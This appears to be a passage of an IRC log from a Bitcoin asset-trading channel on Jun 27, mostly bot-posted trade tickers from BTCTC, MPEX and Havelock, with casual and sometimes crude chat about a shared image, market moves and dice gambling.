[BTCTC] [AMC-PT] 55 @ 0.0025 = 0.1375 BTC [-] Jun 27 18:53:12 [BTCTC] [AMC-PT] 50 @ 0.0025 = 0.125 BTC [-] Jun 27 18:53:26 [BTCTC] [DMS.MINING] 30 @ 0.021989 = 0.6597 BTC [-] Jun 27 18:54:33 [BTCTC] [AMC-PT] 30 @ 0.0025 = 0.075 BTC [-] Jun 27 18:55:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.034 BTC [+] Jun 27 18:57:01 [BTCTC] [ASICMINER-PT] 1 @ 3.425 BTC [-] Jun 27 18:57:42 [BTCTC] [ASICMINER-PT] 1 @ 3.42 BTC [-] Jun 27 18:57:44 [BTCTC] [ASICMINER-PT] 1 @ 3.41 BTC [-] Jun 27 18:57:46 [BTCTC] [ASICMINER-PT] 2 @ 3.401 = 6.802 BTC [-] Jun 27 18:58:17 [BTCTC] [AMC-PT] 26 @ 0.0025 = 0.065 BTC [-] Jun 27 18:58:20 [BTCTC] [AMC-PT] 43 @ 0.0025 = 0.1075 BTC [-] Jun 27 18:58:28 [BTCTC] [AMC-PT] 100 @ 0.0025 = 0.25 BTC [-] Jun 27 18:59:05 [BTCTC] [COGNITIVE] 5 @ 0.495001 = 2.475 BTC [+] Jun 27 18:59:12 [BTCTC] [AMC-PT] 7 @ 0.0025 = 0.0175 BTC [-] Jun 27 19:02:15 [MPEX] [S.MG] 10000 @ 0.00014 = 1.4 BTC [+] Jun 27 19:02:25 [BTCTC] [AMC-PT] 200 @ 0.0025 = 0.5 BTC [-] Jun 27 19:02:27 [MPEX] [S.MG] 9999 @ 0.00014999 = 1.4998 BTC [+] Jun 27 19:02:29 [MPEX] [S.MG] 5001 @ 0.00015 = 0.7502 BTC [+] Jun 27 19:02:33 [BTCTC] [COGNITIVE] 5 @ 0.489999 = 2.45 BTC [-] Jun 27 19:02:37 [BTCTC] [TAT.ASICMINER] 1 @ 0.03409 BTC [+] Jun 27 19:02:39 [BTCTC] [TAT.ASICMINER] 1 @ 0.034199 BTC [+] Jun 27 19:02:40 [BTCTC] [TAT.ASICMINER] 1 @ 0.0342 BTC [+] Jun 27 19:03:41 [BTCTC] [TAT.ASICMINER] 1 @ 0.0342 BTC [+] Jun 27 19:04:13 [BTCTC] [AMC-PT] 8 @ 0.0025 = 0.02 BTC [-] Jun 27 19:04:18 [BTCTC] [COGNITIVE] 5 @ 0.495001 = 2.475 BTC [+] Jun 27 19:04:32 [BTCTC] [S.DICE-PT] 2 @ 0.0021 = 0.0042 BTC [-] Jun 27 19:04:37 [BTCTC] [TAT.ASICMINER] 4 @ 0.034 = 0.136 BTC [-] Jun 27 19:04:39 [BTCTC] [TAT.ASICMINER] 1 @ 0.034 BTC [-] Jun 27 19:04:48 [BTCTC] [AMC-PT] 39 @ 0.0025 = 0.0975 BTC [-] Jun 27 19:05:05 [BTCTC] [COGNITIVE] 1 @ 0.470004 BTC [-] Jun 27 19:05:16 [BTCTC] [AMC-PT] 4 @ 0.0025 = 0.01 BTC [-] Jun 27 19:05:30 [BTCTC] [AMC-PT] 400 @ 0.0025 = 1 BTC [-] Jun 27 19:06:15 [BTCTC] [COGNITIVE] 5 @ 0.459999 = 2.3 BTC [-] Jun 27 19:06:28 [BTCTC] [AMC-PT] 400 @ 0.0025 = 1 BTC [-] Jun 27 19:06:56 [BTCTC] [TAT.VIRTUALMINE] 150 @ 0.004901 = 0.7352 BTC [+] Jun 27 19:07:18 [BTCTC] [COGNITIVE] 5 @ 0.495001 = 2.475 BTC [+] Jun 27 19:08:01 [BTCTC] [TAT.VIRTUALMINE] 33 @ 0.005 = 0.165 BTC [+] Jun 27 19:08:15 [BTCTC] [COGNITIVE] 5 @ 0.459999 = 2.3 BTC [-] Jun 27 19:09:03 [BTCTC] [TAT.ASICMINER] 3 @ 0.0333 = 0.0999 BTC [-] Jun 27 19:09:25 [BTCTC] [AMC-PT] 100 @ 0.0025 = 0.25 BTC [-] Jun 27 19:09:27 [BTCTC] [COGNITIVE] 5 @ 0.495001 = 2.475 BTC [+] Jun 27 19:09:39 [BTCTC] [AMC-PT] 40 @ 0.0025 = 0.1 BTC [-] Jun 27 19:10:26 [BTCTC] [COGNITIVE] 5 @ 0.459999 = 2.3 BTC [-] Jun 27 19:10:35 [BTCTC] [COGNITIVE] 1 @ 0.46 BTC [+] Jun 27 19:10:37 [BTCTC] [COGNITIVE] 6 @ 0.505 = 3.03 BTC [+] Jun 27 19:10:38 [BTCTC] [COGNITIVE] 1 @ 0.525 BTC [+] Jun 27 19:10:39 [BTCTC] [COGNITIVE] 1 @ 0.53 BTC [+] Jun 27 19:10:41 [BTCTC] [COGNITIVE] 3 @ 0.531 = 1.593 BTC [+] Jun 27 19:10:42 [BTCTC] [COGNITIVE] 27 @ 0.535 = 14.445 BTC [+] Jun 27 19:12:23 [BTCTC] [COGNITIVE] 5 @ 0.520001 = 2.6 BTC [-] Jun 27 19:13:24 [BTCTC] [COGNITIVE] 5 @ 0.459999 = 2.3 BTC [-] Jun 27 19:14:18 [BTCTC] [COGNITIVE] 5 @ 0.520001 = 2.6 BTC [+] Jun 27 19:14:41 [BTCTC] [AMC-PT] 2000 @ 0.0025 = 5 BTC [-] Jun 27 19:15:18 [BTCTC] [COGNITIVE] 5 @ 0.449999 = 2.25 BTC [-] Jun 27 19:15:35 [BTCTC] [COGNITIVE] 1 @ 0.45 BTC [+] Jun 27 19:15:38 [BTCTC] [AMC-PT] 101 @ 0.0025 = 0.2525 BTC [-] Jun 27 19:16:17 [BTCTC] [AMC-PT] 140 @ 0.0025 = 0.35 BTC [-] Jun 27 19:16:23 [BTCTC] [COGNITIVE] 5 @ 0.520001 = 2.6 BTC [+] Jun 27 19:16:51 [BTCTC] [TAT.ASICMINER] 1 @ 0.0339 BTC [+] Jun 27 19:16:53 [BTCTC] [TAT.ASICMINER] 249 @ 0.033999 = 8.4658 BTC [+] Jun 27 19:16:59 [BTCTC] [AMC-PT] 6 @ 0.0025 = 0.015 BTC [-] Jun 27 19:17:11 [BTCTC] [AMC-PT] 1000 @ 0.0025 = 2.5 BTC [-] Jun 27 19:17:21 [BTCTC] [TAT.ASICMINER] 1 @ 0.033997 BTC [-] Jun 27 19:17:23 [BTCTC] [TAT.ASICMINER] 50 @ 0.033998 = 1.6999 BTC [+] Jun 27 19:17:25 [BTCTC] [COGNITIVE] 5 @ 0.449999 = 2.25 BTC [-] Jun 27 19:18:17 [BTCTC] [COGNITIVE] 5 @ 0.520001 = 2.6 BTC [+] Jun 27 19:19:15 [BTCTC] [COGNITIVE] 5 @ 0.449999 = 2.25 BTC [-] Jun 27 19:22:19 [BTCTC] [COGNITIVE] 5 @ 0.520001 = 2.6 BTC [+] Jun 27 19:23:18 [BTCTC] [COGNITIVE] 5 @ 0.449999 = 2.25 BTC [-] Jun 27 19:24:17 [BTCTC] [COGNITIVE] 5 @ 0.520001 = 2.6 BTC [+] Jun 27 19:24:31 [BTCTC] [RSM] 4 @ 0.023995 = 0.096 BTC [+] Jun 27 19:25:28 [BTCTC] [AMC-PT] 13 @ 0.0025 = 0.0325 BTC [-] Jun 27 19:25:31 [BTCTC] [COGNITIVE] 5 @ 0.449999 = 2.25 BTC [-] Jun 27 19:25:36 [BTCTC] [AMC-PT] 30 @ 0.0025 = 0.075 BTC [-] Jun 27 19:28:26 [BTCTC] [COGNITIVE] 1 @ 0.520001 BTC [+] Jun 27 19:28:29 [BTCTC] [AMC-PT] 50 @ 0.0025 = 0.125 BTC [-] Jun 27 19:28:57 [BTCTC] [TAT.ASICMINER] 1 @ 0.03398 BTC [-] Jun 27 19:29:25 [BTCTC] [AMC-PT] 8 @ 0.0025 = 0.02 BTC [-] Jun 27 19:29:31 [BTCTC] [TAT.ASICMINER] 14 @ 0.033989 = 0.4758 BTC [+] Jun 27 19:31:05 [BTCTC] [ASICMINER-PT] 1 @ 3.401087 BTC [+] Jun 27 19:31:30 [BTCTC] [COGNITIVE] 1 @ 0.449999 BTC [-] Jun 27 19:31:58 [BTCTC] [COGNITIVE] 1 @ 0.449998 BTC [-] Jun 27 19:32:11 [BTCTC] [RSM] 3 @ 0.022001 = 0.066 BTC [-] Jun 27 19:32:23 [BTCTC] [AMC-PT] 50 @ 0.0025 = 0.125 BTC [-] Jun 27 19:32:53 [BTCTC] [AMC-PT] 27 @ 0.0025 = 0.0675 BTC [-] Jun 27 19:33:12 [BTCTC] [AMC-PT] 1350 @ 0.0025 = 3.375 BTC [-] Jun 27 19:33:15 [BTCTC] [COGNITIVE] 1 @ 0.520001 BTC [+] Jun 27 19:33:57 [BTCTC] [AMC-PT] 8 @ 0.0025 = 0.02 BTC [-] Jun 27 19:34:11 [BTCTC] [COGNITIVE] 1 @ 0.449999 BTC [-] Jun 27 19:34:36 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [-] Jun 27 19:35:32 [BTCTC] [AMC-PT] 671 @ 0.0025 = 1.6775 BTC [-] Jun 27 19:36:14 [HAVELOCK] [HIM] 1 @ 0.298999 BTC [+] Jun 27 19:36:25 [BTCTC] [COGNITIVE] 1 @ 0.520001 BTC [+] Jun 27 19:36:43 [BTCTC] [AMC-PT] 9 @ 0.0025 = 0.0225 BTC [-] Jun 27 19:37:04 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.005225 BTC [+] Jun 27 19:38:25 [HAVELOCK] [ASICM] 84 @ 0.0339 = 2.8476 BTC [+] Jun 27 19:38:35 [BTCTC] [COGNITIVE] 1 @ 0.449999 BTC [-] Jun 27 19:38:40 [HAVELOCK] [ASICM] 21 @ 0.033999 = 0.714 BTC [+] Jun 27 19:39:31 [BTCTC] [COGNITIVE] 1 @ 0.520001 BTC [+] Jun 27 19:40:19 [BTCTC] [ASICMINER-PT] 1 @ 3.401 BTC [-] Jun 27 19:40:21 [BTCTC] [ASICMINER-PT] 2 @ 3.391 = 6.782 BTC [-] Jun 27 19:40:26 [BTCTC] [COGNITIVE] 1 @ 0.449999 BTC [-] Jun 27 19:41:35 [BTCTC] [AMC-PT] 25 @ 0.0025 = 0.0625 BTC [-] Jun 27 19:41:41 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [-] Jun 27 19:41:55 [BTCTC] [AMC-PT] 4000 @ 0.0025 = 10 BTC [-] Jun 27 19:42:05 [BTCTC] [AMC-PT] 1500 @ 0.0025 = 3.75 BTC [-] Jun 27 19:42:16 [BTCTC] [AMC-PT] 10 @ 0.0025 = 0.025 BTC [-] Jun 27 19:42:48 [BTCTC] [AMC-PT] 5250 @ 0.0025 = 13.125 BTC [-] Jun 27 19:43:08 [BTCTC] [S.MPOE-PT] 6 @ 0.000885 = 0.0053 BTC [-] Jun 27 19:43:15 [BTCTC] [AMC-PT] 18 @ 0.0025 = 0.045 BTC [-] Jun 27 19:44:14 [BTCTC] [ASICMINER-PT] 1 @ 3.386 BTC [-] Jun 27 19:44:21 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.005006 BTC [-] Jun 27 19:44:22 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.005006 BTC [-] Jun 27 19:44:23 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.005005 = 0.2503 BTC [-] Jun 27 19:45:05 [BTCTC] [AMC-PT] 1300 @ 0.0025 = 3.25 BTC [-] Jun 27 19:45:34 [BTCTC] [AMC-PT] 45 @ 0.0025 = 0.1125 BTC [-] Jun 27 19:46:26 [BTCTC] [ASICMINER-PT] 4 @ 3.386 = 13.544 BTC [-] Jun 27 19:46:28 [BTCTC] [ASICMINER-PT] 4 @ 3.38 = 13.52 BTC [-] Jun 27 19:46:51 [BTCTC] [AMC-PT] 320 @ 0.0025 = 0.8 BTC [-] Jun 27 19:47:50 [BTCTC] [ASICMINER-PT] 2 @ 3.3773 = 6.7546 BTC [-] Jun 27 19:47:57 [BTCTC] [ASICMINER-PT] 2 @ 3.3773 = 6.7546 BTC [-] Jun 27 19:48:02 [BTCTC] [ASICMINER-PT] 2 @ 3.3773 = 6.7546 BTC [-] Jun 27 19:49:01 [BTCTC] [ASICMINER-PT] 6 @ 3.376101 = 20.2566 BTC [-] Jun 27 19:49:02 [BTCTC] [ASICMINER-PT] 1 @ 3.3761 BTC [-] Jun 27 19:49:04 [BTCTC] [ASICMINER-PT] 6 @ 3.376 = 20.256 BTC [-] Jun 27 19:49:15 [BTCTC] [ASICMINER-PT] 4 @ 3.419989 = 13.68 BTC [+] Jun 27 19:50:58 [BTCTC] [AMC-PT] 2997 @ 0.0025 = 7.4925 BTC [-] Jun 27 19:51:20 [BTCTC] [TAT.ASICMINER] 1 @ 0.034 BTC [+] Jun 27 19:51:22 [BTCTC] [TAT.ASICMINER] 102 @ 0.03398 = 3.466 BTC [-] Jun 27 19:52:12 [BTCTC] [TAT.ASICMINER] 6 @ 0.03398 = 0.2039 BTC [-] Jun 27 19:52:32 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [-] Jun 27 19:54:00 [BTCTC] [AMC-PT] 10 @ 0.0025 = 0.025 BTC [-] Jun 27 19:58:07 [BTCTC] [S.BBET-PT] 1 @ 0.00141 BTC [-] Jun 27 19:59:04 [BTCTC] [S.BBET-PT] 1 @ 0.0014 BTC [-] Jun 27 20:00:50 [BTCTC] [AMC-PT] 400 @ 0.0025 = 1 BTC [-] Jun 27 20:01:00 [BTCTC] [COGNITIVE] 5 @ 0.495002 = 2.475 BTC [+] Jun 27 20:01:02 [BTCTC] [COGNITIVE] 1 @ 0.495001 BTC [-] Jun 27 20:02:19 [BTCTC] [AMC-PT] 415 @ 0.0025 = 1.0375 BTC [-] Jun 27 20:03:02 [HAVELOCK] [HIM] 1 @ 0.2988 BTC [-] Jun 27 20:03:15 [HAVELOCK] [ASICM] 3 @ 0.03389901 = 0.1017 BTC [-] Jun 27 20:04:08 [BTCTC] [AMC-PT] 1000 @ 0.0025 = 2.5 BTC [-] Jun 27 20:06:23 http://i.imgur.com/uy6jeUj.jpg Jun 27 20:06:27 i have created a monsters. Jun 27 20:07:00 wtf Jun 27 20:07:00 [BTCTC] [AMC-PT] 80 @ 0.0025 = 0.2 BTC [-] Jun 27 20:07:06 ikr? Jun 27 20:08:59 kids these days Jun 27 20:09:43 oh god Jun 27 20:10:51 [BTCTC] [TAT.ASICMINER] 1 @ 0.0341 BTC [+] Jun 27 20:11:40 so my letter to a new artist guy who just delivered some stuff starts with "I like it, but could you make it more red ?" Jun 27 20:11:44 just for shits and giggles. Jun 27 20:14:15 jesus christ MP, I hope you paid the man. Jun 27 20:14:35 i'm sure you did, but he will spend that BTC and be left with only memories. Jun 27 20:14:43 [BTCTC] [ASICMINER-PT] 3 @ 3.39 = 10.17 BTC [-] Jun 27 20:14:43 of butt markers Jun 27 20:17:02 [BTCTC] [TAT.ASICMINER] 1 @ 0.034189 BTC [+] Jun 27 20:18:51 [BTCTC] [CRYPTO-TRADE] 1 @ 0.19997 BTC [+] Jun 27 20:18:53 [BTCTC] [CRYPTO-TRADE] 1 @ 0.2 BTC [+] Jun 27 20:19:49 he volunteered it. Jun 27 20:19:56 i did pay him yest to write .1 on his tit... Jun 27 20:21:26 [HAVELOCK] [ASICM] 1 @ 0.03389901 BTC [-] Jun 27 20:22:03 [HAVELOCK] [ASICM] 14 @ 0.033899 = 0.4746 BTC [-] Jun 27 20:25:21 [BTCTC] [TAT.ASICMINER] 94 @ 0.03398 = 3.1941 BTC [-] Jun 27 20:27:52 [BTCTC] [AMC-PT] 45 @ 0.0025 = 0.1125 BTC [-] Jun 27 20:28:47 [BTCTC] [CRYPTO-TRADE] 7 @ 0.2 = 1.4 BTC [+] Jun 27 20:29:03 ha. Jun 27 20:29:34 jesus christ I should have never opened that link Jun 27 20:29:43 fucking shiit Jun 27 20:31:00 sorry. Jun 27 20:31:15 ewwwWWwww Jun 27 20:31:29 so much body angst Jun 27 20:32:00 I would not unless you like balls hairy arses and pens Jun 27 20:32:04 ew Jun 27 20:32:22 y'all have weak mental immune systems Jun 27 20:32:43 I just know what I like and dont like to look at Jun 27 20:33:05 same as food I know what I like :) Jun 27 20:33:28 [BTCTC] [AMC-PT] 45 @ 0.0025 = 0.1125 BTC [-] Jun 27 20:33:35 [BTCTC] [AMC-PT] 2500 @ 0.0025 = 6.25 BTC [-] Jun 27 20:34:36 20:34:16 (2621) anyone else ordered avalols Jun 27 20:34:47 ok which one of you trollwits is it. jcpham ? imsaguy ? Jun 27 20:34:53 [HAVELOCK] [ASICM] 4 @ 0.034 = 0.136 BTC [+] Jun 27 20:35:08 lol Jun 27 20:35:09 not me Jun 27 20:35:32 [BTCTC] [ASICMINER-PT] 1 @ 3.39 BTC [-] Jun 27 20:35:36 but you'll notice that person didn't keep their nick very long Jun 27 20:35:43 they still use it Jun 27 20:35:49 this is from the just-dice site. Jun 27 20:36:16 [BTCTC] [ASICMINER-PT] 2 @ 3.38 = 6.76 BTC [-] Jun 27 20:36:45 [BTCTC] [AMC-PT] 400 @ 0.0025 = 1 BTC [-] Jun 27 20:37:54 [BTCTC] [RSM] 3 @ 0.022001 = 0.066 BTC [-] Jun 27 20:37:56 [BTCTC] [RSM] 1 @ 0.022001 BTC [-] Jun 27 20:37:56 [BTCTC] [RSM] 19 @ 0.022 = 0.418 BTC [-] Jun 27 20:37:58 [BTCTC] [RSM] 10 @ 0.0219 = 0.219 BTC [-] Jun 27 20:38:00 [BTCTC] [RSM] 14 @ 0.0217 = 0.3038 BTC [-] Jun 27 20:38:01 [BTCTC] [RSM] 20 @ 0.0212 = 0.424 BTC [-] Jun 27 20:38:03 [BTCTC] [RSM] 20 @ 0.0211 = 0.422 BTC [-] Jun 27 20:38:43 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [-] Jun 27 20:38:50 [BTCTC] [AMC-PT] 800 @ 0.0025 = 2 BTC [-] Jun 27 20:39:57 [BTCTC] [DMS.MINING] 10 @ 0.021121 = 0.2112 BTC [-] Jun 27 20:40:20 [BTCTC] [AMC-PT] 3 @ 0.0025 = 0.0075 BTC [-] Jun 27 20:40:22 [BTCTC] [CRYPTO-TRADE] 2 @ 0.2 = 0.4 BTC [+] Jun 27 20:40:44 [BTCTC] [TAT.ASICMINER] 21 @ 0.03398 = 0.7136 BTC [-] Jun 27 20:40:46 [BTCTC] [TAT.ASICMINER] 1 @ 0.03398 BTC [-] Jun 27 20:41:18 [BTCTC] [DMS.MINING] 10 @ 0.021121 = 0.2112 BTC [-] Jun 27 20:41:27 [BTCTC] [DMS.MINING] 2 @ 0.02112 = 0.0422 BTC [-] Jun 27 20:41:56 [BTCTC] [DMS.SELLING] 10 @ 0.033189 = 0.3319 BTC [+] Jun 27 20:43:00 [BTCTC] [AMC-PT] 293 @ 0.0025 = 0.7325 BTC [-] Jun 27 20:43:59 [BTCTC] [AMC-PT] 5 @ 0.0025 = 0.0125 BTC [-] Jun 27 20:44:10 [BTCTC] [AMC-PT] 500 @ 0.0025 = 1.25 BTC [-] Jun 27 20:44:24 [BTCTC] [AMC-PT] 186 @ 0.0025 = 0.465 BTC [-] Jun 27 20:44:27 [BTCTC] [AMC-PT] 20 @ 0.0025 = 0.05 BTC [-] Jun 27 20:45:23 [BTCTC] [AMC-PT] 10 @ 0.0025 = 0.025 BTC [-] Jun 27 20:45:46 [BTCTC] [AMC-PT] 250 @ 0.0025 = 0.625 BTC [-] Jun 27 20:46:34 [BTCTC] [TAT.ASICMINER] 1 @ 0.033999 BTC [+] Jun 27 20:47:07 [BTCTC] [AMC-PT] 700 @ 0.0025 = 1.75 BTC [-] Jun 27 20:47:23 [BTCTC] [ASICMINER-PT] 2 @ 3.38 = 6.76 BTC [-] Jun 27 20:50:15 [HAVELOCK] [ASICM] 4 @ 0.034 = 0.136 BTC [+] Jun 27 20:50:17 "@Crosby, ask our real customers. Our service is immediate, responsive and personal. As is our security." Jun 27 20:50:22 personal securitah. Jun 27 20:50:22 [BTCTC] [AMC-PT] 52 @ 0.0025 = 0.13 BTC [-] Jun 27 20:50:29 [BTCTC] [ASICMINER-PT] 2 @ 3.39999 = 6.8 BTC [+] Jun 27 20:50:31 [BTCTC] [ASICMINER-PT] 6 @ 3.4 = 20.4 BTC [+] Jun 27 20:50:33 [BTCTC] [ASICMINER-PT] 23 @ 3.408999 = 78.407 BTC [+] Jun 27 20:50:48 https://bitcointalk.org/index.php?topic=91587.0 shit's pretty funny. Jun 27 20:50:53 StrikeSapphire: NEW $0.50 Hourly Freerolls + 15 BTC Weekend Leaderboard is back! Jun 27 20:51:50 [BTCTC] [ASICMINER-PT] 8 @ 3.376 = 27.008 BTC [-] Jun 27 20:51:52 [BTCTC] [ASICMINER-PT] 2 @ 3.3751 = 6.7502 BTC [-] Jun 27 20:52:33 [BTCTC] [TAT.ASICMINER] 9 @ 0.033999 = 0.306 BTC [+] Jun 27 20:52:45 [BTCTC] [AMC-PT] 800 @ 0.0025 = 2 BTC [-] Jun 27 20:53:18 [BTCTC] [DMS.SELLING] 15 @ 0.031101 = 0.4665 BTC [-] Jun 27 20:53:23 [BTCTC] [TAT.ASICMINER] 1 @ 0.033998 BTC [-] Jun 27 20:53:25 [BTCTC] [TAT.ASICMINER] 10 @ 0.033999 = 0.34 BTC [+] Jun 27 20:53:47 [BTCTC] [DMS.PURCHASE] 15 @ 0.053705 = 0.8056 BTC [-] Jun 27 20:54:29 [BTCTC] [AMC-PT] 50 @ 0.0025 = 0.125 BTC [-] Jun 27 20:55:25 [BTCTC] [ASICMINER-PT] 1 @ 3.39999 BTC [+] Jun 27 20:55:36 [BTCTC] [AMC-PT] 1000 @ 0.0025 = 2.5 BTC [-] Jun 27 20:56:43 [BTCTC] [ASICMINER-PT] 1 @ 3.3751 BTC [-] Jun 27 20:56:45 [BTCTC] [ASICMINER-PT] 3 @ 3.375 = 10.125 BTC [-] Jun 27 20:56:53 [BTCTC] [ASICMINER-PT] 1 @ 3.371101 BTC [-] Jun 27 20:56:56 [BTCTC] [ASICMINER-PT] 2 @ 3.370001 = 6.74 BTC [-] Jun 27 20:56:58 [BTCTC] [ASICMINER-PT] 4 @ 3.37 = 13.48 BTC [-] Jun 27 20:57:00 [BTCTC] [ASICMINER-PT] 1 @ 3.37 BTC [-] Jun 27 20:57:46 [BTCTC] [AMC-PT] 3 @ 0.0025 = 0.0075 BTC [-] Jun 27 20:57:58 [BTCTC] [AMC-PT] 940 @ 0.0025 = 2.35 BTC [-] Jun 27 20:59:38 [BTCTC] [TAT.ASICMINER] 18 @ 0.033515 = 0.6033 BTC [-] Jun 27 20:59:57 [BTCTC] [ASICMINER-PT] 2 @ 3.36 = 6.72 BTC [-] Jun 27 20:59:58 [BTCTC] [ASICMINER-PT] 3 @ 3.357 = 10.071 BTC [-] Jun 27 21:00:00 [BTCTC] [ASICMINER-PT] 1 @ 3.353 BTC [-] Jun 27 21:00:02 [BTCTC] [ASICMINER-PT] 1 @ 3.352 BTC [-] Jun 27 21:00:04 [BTCTC] [ASICMINER-PT] 1 @ 3.351 BTC [-] Jun 27 21:00:05 [BTCTC] [TAT.ASICMINER] 10 @ 0.033515 = 0.3352 BTC [-] Jun 27 21:00:15 [BTCTC] [ASICMINER-PT] 1 @ 3.351 BTC [-] Jun 27 21:00:20 [BTCTC] [BTC-BOND] 5 @ 0.009998 = 0.05 BTC [+] Jun 27 21:00:21 [BTCTC] [ASICMINER-PT] 1 @ 3.34 BTC [-] Jun 27 21:00:23 [BTCTC] [BTC-BOND] 256 @ 0.009999 = 2.5597 BTC [+] Jun 27 21:00:24 [BTCTC] [ASICMINER-PT] 2 @ 3.334 = 6.668 BTC [-] Jun 27 21:00:24 [BTCTC] [BTC-BOND] 739 @ 0.01 = 7.39 BTC [+] Jun 27 21:00:27 [BTCTC] [ASICMINER-PT] 3 @ 3.3322 = 9.9966 BTC [-] Jun 27 21:00:29 [BTCTC] [ASICMINER-PT] 5 @ 3.332101 = 16.6605 BTC [-] Jun 27 21:00:58 [BTCTC] [ASICMINER-PT] 1 @ 3.389999 BTC [+] Jun 27 21:00:59 [BTCTC] [AMC-PT] 281 @ 0.0025 = 0.7025 BTC [-] Jun 27 21:01:49 [BTCTC] [AMC-PT] 1000 @ 0.0025 = 2.5 BTC [-] Jun 27 21:02:11 [BTCTC] [AMC-PT] 100 @ 0.0025 = 0.25 BTC [-] Jun 27 21:02:33 [BTCTC] [RSM] 9 @ 0.0211 = 0.1899 BTC [-] Jun 27 21:03:35 [BTCTC] [AMC-PT] 75 @ 0.0025 = 0.1875 BTC [-] Jun 27 21:03:53 [BTCTC] [AMC-PT] 10000 @ 0.0025 = 25 BTC [-] Jun 27 21:06:31 [BTCTC] [B.YABMC] 152 @ 0.006271 = 0.9532 BTC [+] Jun 27 21:06:49 [BTCTC] [AMC-PT] 17 @ 0.0025 = 0.0425 BTC [-] Jun 27 21:06:56 [BTCTC] [AMC-PT] 100 @ 0.0025 = 0.25 BTC [-] Jun 27 21:07:03 [BTCTC] [B.YABMC] 1 @ 0.00627 BTC [-] Jun 27 21:07:05 [BTCTC] [B.YABMC] 80 @ 0.006 = 0.48 BTC [-] Jun 27 21:07:10 [BTCTC] [AMC-PT] 5 @ 0.0025 = 0.0125 BTC [-] Jun 27 21:07:11 [BTCTC] [ASICMINER-PT] 21 @ 3.575 = 75.075 BTC [+] Jun 27 21:07:29 [BTCTC] [B.YABMC] 100 @ 0.005725 = 0.5725 BTC [-] Jun 27 21:09:23 [BTCTC] [TAT.ASICMINER] 17 @ 0.033562 = 0.5706 BTC [+] Jun 27 21:10:19 [BTCTC] [ASICMINER-PT] 1 @ 3.332203 BTC [-] Jun 27 21:10:21 [BTCTC] [ASICMINER-PT] 1 @ 3.332202 BTC [-] Jun 27 21:11:11 [BTCTC] [AMC-PT] 2650 @ 0.0025 = 6.625 BTC [-] Jun 27 21:11:27 [BTCTC] [AMC-PT] 3 @ 0.0025 = 0.0075 BTC [-] Jun 27 21:11:34 [BTCTC] [ASICMINER-PT] 1 @ 3.3322 BTC [-] Jun 27 21:11:36 [BTCTC] [ASICMINER-PT] 1 @ 3.332102 BTC [-] Jun 27 21:11:38 [BTCTC] [ASICMINER-PT] 1 @ 3.332101 BTC [-] Jun 27 21:11:40 [BTCTC] [ASICMINER-PT] 15 @ 3.3321 = 49.9815 BTC [-] Jun 27 21:11:42 [BTCTC] [ASICMINER-PT] 1 @ 3.331003 BTC [-] Jun 27 21:11:44 [BTCTC] [ASICMINER-PT] 1 @ 3.33 BTC [-] Jun 27 21:11:46 [BTCTC] [ASICMINER-PT] 2 @ 3.33 = 6.66 BTC [-] Jun 27 21:11:48 [BTCTC] [ASICMINER-PT] 1 @ 3.3239 BTC [-] Jun 27 21:11:50 [BTCTC] [ASICMINER-PT] 5 @ 3.315 = 16.575 BTC [-] Jun 27 21:11:52 [BTCTC] [ASICMINER-PT] 1 @ 3.31 BTC [-] Jun 27 21:13:18 [BTCTC] [ASICMINER-PT] 1 @ 3.31 BTC [-] Jun 27 21:13:38 [BTCTC] [ASICMINER-PT] 1 @ 3.31 BTC [-] Jun 27 21:13:40 [BTCTC] [ASICMINER-PT] 1 @ 3.302 BTC [-] Jun 27 21:13:42 [BTCTC] [ASICMINER-PT] 14 @ 3.3014 = 46.2196 BTC [-] Jun 27 21:14:32 [HAVELOCK] [ASICM] 2 @ 0.034 = 0.068 BTC [+] Jun 27 21:14:52 [BTCTC] [TAT.ASICMINER] 2 @ 0.033979 = 0.068 BTC [+] Jun 27 21:14:53 lol Jun 27 21:15:06 AM selloff soon to be followed by AMC rally Jun 27 21:15:09 wait for it... Jun 27 21:15:45 lol nope. i tell you, they'll s.dice Jun 27 21:15:48 i mean j.dice Jun 27 21:15:57 [BTCTC] [AMC-PT] 10 @ 0.0025 = 0.025 BTC [-] Jun 27 21:16:24 +1 for AMC rally xD Jun 27 21:16:27 if theyre smart Jun 27 21:16:31 they will jdice Jun 27 21:16:38 but what are the odds? Jun 27 21:16:54 provably nice! Jun 27 21:18:01 [BTCTC] [TAT.ASICMINER] 114 @ 0.033603 = 3.8307 BTC [-] Jun 27 21:19:22 [BTCTC] [AMC-PT] 2500 @ 0.0025 = 6.25 BTC [-] Jun 27 21:19:50 lol provably nice Jun 27 21:19:56 [BTCTC] [GSDPT] 100 @ 0.002115 = 0.2115 BTC [-] Jun 27 21:20:05 mircea_popescu: hehe Jun 27 21:20:41 [HAVELOCK] [ASICM] 10 @ 0.03390001 = 0.339 BTC [-] Jun 27 21:20:48 [HAVELOCK] [ASICM] 1 @ 0.0339 BTC [-] Jun 27 21:20:54 [HAVELOCK] [ASICM] 10 @ 0.03389901 = 0.339 BTC [-] Jun 27 21:21:15 [HAVELOCK] [ASICM] 77 @ 0.033899 = 2.6102 BTC [-] Jun 27 21:21:59 [BTCTC] [ASICMINER-PT] 1 @ 3.3 BTC [-] Jun 27 21:22:26 [BTCTC] [AMC-PT] 87 @ 0.0025 = 0.2175 BTC [-] Jun 27 21:23:16 [BTCTC] [ASICMINER-PT] 2 @ 3.266103 = 6.5322 BTC [-] Jun 27 21:23:50 [BTCTC] [TAT.ASICMINER] 3 @ 0.033607 = 0.1008 BTC [+] Jun 27 21:23:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.033604 BTC [-] Jun 27 21:23:52 [BTCTC] [TAT.ASICMINER] 35 @ 0.033602 = 1.1761 BTC [-] Jun 27 21:24:44 [BTCTC] [TAT.ASICMINER] 15 @ 0.033602 = 0.504 BTC [-] Jun 27 21:24:47 [BTCTC] [TAT.ASICMINER] 1 @ 0.033599 BTC [-] Jun 27 21:24:49 [BTCTC] [TAT.ASICMINER] 1 @ 0.033563 BTC [-] Jun 27 21:24:51 [BTCTC] [TAT.ASICMINER] 171 @ 0.033514 = 5.7309 BTC [-] Jun 27 21:24:52 [BTCTC] [TAT.ASICMINER] 1 @ 